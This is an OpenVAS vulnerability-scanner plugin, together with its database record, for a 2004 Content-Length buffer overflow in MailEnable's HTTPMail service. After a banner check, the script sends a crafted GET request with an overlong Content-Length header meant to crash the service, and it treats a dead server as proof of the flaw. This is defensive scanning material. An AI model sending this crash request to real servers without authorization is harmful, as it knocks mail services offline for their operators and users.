MailEnable HTTPMail Service Content-Length Overflow Vulnerability
2005-11-03T00:00:00
ID OPENVAS:136141256231014655 Type openvas Reporter This script is Copyright (C) 2004 George A. Theall Modified 2018-04-06T00:00:00
Description
The remote web server is affected by a buffer overflow vulnerability.
Description :
The target is running at least one instance of MailEnable that has a
flaw in the HTTPMail service (MEHTTPS.exe) in the Professional and
Enterprise Editions. The flaw can be exploited by issuing an HTTP GET
with an Content-Length header exceeding 100 bytes, which causes a
fixed-length buffer to overflow, crashing the HTTPMail service and
possibly allowing for arbitrary code execution.
# OpenVAS Vulnerability Test
# $Id: mailenable_httpmail_content_length_overflow.nasl 9348 2018-04-06 07:01:19Z cfischer $
# Description: MailEnable HTTPMail Service Content-Length Overflow Vulnerability
#
# Authors:
# George A. Theall, <theall@tifaware.com>
#
# Copyright:
# Copyright (C) 2004 George A. Theall
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
tag_summary = "The remote web server is affected by a buffer overflow vulnerability.
Description :
The target is running at least one instance of MailEnable that has a
flaw in the HTTPMail service (MEHTTPS.exe) in the Professional and
Enterprise Editions. The flaw can be exploited by issuing an HTTP GET
with an Content-Length header exceeding 100 bytes, which causes a
fixed-length buffer to overflow, crashing the HTTPMail service and
possibly allowing for arbitrary code execution.";
tag_solution = "Upgrade to MailEnable Professional / Enterprise 1.2 or later or apply
the HTTPMail hotfix from 9th August 2004 found at
http://www.mailenable.com/hotfix/";
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.14655");
script_version("$Revision: 9348 $");
script_tag(name:"last_modification", value:"$Date: 2018-04-06 09:01:19 +0200 (Fri, 06 Apr 2018) $");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_bugtraq_id(10838);
script_xref(name:"OSVDB", value:"8301");
script_name("MailEnable HTTPMail Service Content-Length Overflow Vulnerability");
script_category(ACT_DENIAL);
script_tag(name:"qod_type", value:"remote_vul");
script_copyright("This script is Copyright (C) 2004 George A. Theall");
script_family("Web application abuses");
script_dependencies("gb_get_http_banner.nasl");
script_mandatory_keys("MailEnable/banner");
script_require_ports("Services/www", 8080);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
script_xref(name : "URL" , value : "http://archives.neohapsis.com/archives/fulldisclosure/2004-07/1314.html");
exit(0);
}
include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
port = get_http_port(default:8080);
if (http_is_dead(port:port)) exit(0);
host = http_host_name(port:port);
# Make sure banner's from MailEnable.
banner = get_http_banner(port:port);
if (banner && egrep(pattern:"^Server: .*MailEnable", string:banner)) {
# Try to bring it down.
req = string(
"GET / HTTP/1.0\r\n",
"Host: ", host, "\r\n",
"Content-Length: ", crap(length:100, data:"9"), "XXXX\r\n",
"\r\n"
);
debug_print("req='", req, "'.\n");
res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
debug_print("res='", res, "'.\n");
# There's a problem if the web server is down.
if (isnull(res)) {
if (http_is_dead(port:port)) security_message(port);
}
}
{"pluginID": "136141256231014655", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mailenable_httpmail_content_length_overflow.nasl 9348 2018-04-06 07:01:19Z cfischer $\n# Description: MailEnable HTTPMail Service Content-Length Overflow Vulnerability\n#\n# Authors:\n# George A. Theall, <theall@tifaware.com>\n#\n# Copyright:\n# Copyright (C) 2004 George A. Theall\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"The remote web server is affected by a buffer overflow vulnerability. \n\nDescription :\n\nThe target is running at least one instance of MailEnable that has a\nflaw in the HTTPMail service (MEHTTPS.exe) in the Professional and\nEnterprise Editions. The flaw can be exploited by issuing an HTTP GET\nwith an Content-Length header exceeding 100 bytes, which causes a\nfixed-length buffer to overflow, crashing the HTTPMail service and\npossibly allowing for arbitrary code execution.\";\n\ntag_solution = \"Upgrade to MailEnable Professional / Enterprise 1.2 or later or apply\nthe HTTPMail hotfix from 9th August 2004 found at\nhttp://www.mailenable.com/hotfix/\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.14655\");\n script_version(\"$Revision: 9348 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:01:19 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_bugtraq_id(10838);\n script_xref(name:\"OSVDB\", value:\"8301\");\n script_name(\"MailEnable HTTPMail Service Content-Length Overflow Vulnerability\");\n script_category(ACT_DENIAL);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"This script is Copyright (C) 2004 George A. Theall\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_mandatory_keys(\"MailEnable/banner\");\n script_require_ports(\"Services/www\", 8080);\n\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_xref(name : \"URL\" , value : \"http://archives.neohapsis.com/archives/fulldisclosure/2004-07/1314.html\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:8080);\nif (http_is_dead(port:port)) exit(0);\n\nhost = http_host_name(port:port);\n\n# Make sure banner's from MailEnable.\nbanner = get_http_banner(port:port);\nif (banner && egrep(pattern:\"^Server: .*MailEnable\", string:banner)) {\n # Try to bring it down.\n req = string(\n \"GET / HTTP/1.0\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Content-Length: \", crap(length:100, data:\"9\"), \"XXXX\\r\\n\",\n \"\\r\\n\"\n );\n debug_print(\"req='\", req, \"'.\\n\");\n res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);\n debug_print(\"res='\", res, \"'.\\n\");\n\n # There's a problem if the web server is down.\n if (isnull(res)) {\n if (http_is_dead(port:port)) security_message(port);\n }\n}\n", "history": [], "description": "The remote web server is affected by a buffer overflow vulnerability. \n\nDescription :\n\nThe target is running at least one instance of MailEnable that has a\nflaw in the HTTPMail service (MEHTTPS.exe) in the Professional and\nEnterprise Editions. The flaw can be exploited by issuing an HTTP GET\nwith an Content-Length header exceeding 100 bytes, which causes a\nfixed-length buffer to overflow, crashing the HTTPMail service and\npossibly allowing for arbitrary code execution.", "reporter": "This script is Copyright (C) 2004 George A. Theall", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231014655", "type": "openvas", "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "ef441fb54e7a80f3f766cfc26df8408c"}, {"key": "href", "hash": "5d5d9c61363709e3561fa6bbb417de65"}, {"key": "modified", "hash": "4fb7fd6149697e74d091717ea3f1ca84"}, {"key": "naslFamily", "hash": "55199d25018fbdb9b50e6b64d444c3a4"}, {"key": "pluginID", "hash": "67b560e7257aba56300d6c8644e6e1a3"}, {"key": "published", "hash": "df034d9b90ece22f6e868d36506db720"}, {"key": "references", "hash": "5961dade9ee30df7f13b87729991b0e4"}, {"key": "reporter", "hash": "1379a50389c6f193209456729856b1a5"}, {"key": "sourceData", "hash": "4da2581fffdd1ea6e30c7be2752b49d2"}, {"key": "title", "hash": "ed312261ec82d978e02b67972105481f"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "viewCount": 1, "references": ["8301", "http://archives.neohapsis.com/archives/fulldisclosure/2004-07/1314.html"], "lastseen": "2018-04-06T11:15:51", "published": "2005-11-03T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "cvelist": [], "id": "OPENVAS:136141256231014655", "hash": "1232c84677cf6a2a39e0b84a621c4a9eac415bf8aa4f01be4a128e5900f77e0a", "modified": "2018-04-06T00:00:00", "title": "MailEnable HTTPMail Service Content-Length Overflow Vulnerability", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "scanner", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "vulnersScore": 7.5}}
